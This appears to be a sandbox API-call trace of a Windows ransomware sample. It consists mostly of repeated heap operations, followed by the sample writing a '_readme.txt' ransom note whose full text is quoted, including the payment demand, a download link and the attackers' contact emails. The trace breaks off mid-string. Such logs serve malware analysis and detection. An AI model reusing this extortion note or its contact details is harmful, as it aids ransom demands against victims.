(HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.096] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.110] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.113] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.115] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.117] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.119] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.119] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.120] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.121] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0175.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.122] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.122] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0175.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.123] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.123] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0175.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0175.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0175.124] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0175.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.124] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0175.124] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.124] PathFindFileNameW (pszPath="") returned="" [0175.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0175.125] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0175.125] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0175.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0175.125] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0175.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0175.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0175.125] FreeLibrary (hLibModule=0x759d0000) returned 1 [0175.125] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0175.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0175.126] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0175.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0175.126] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0175.126] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% 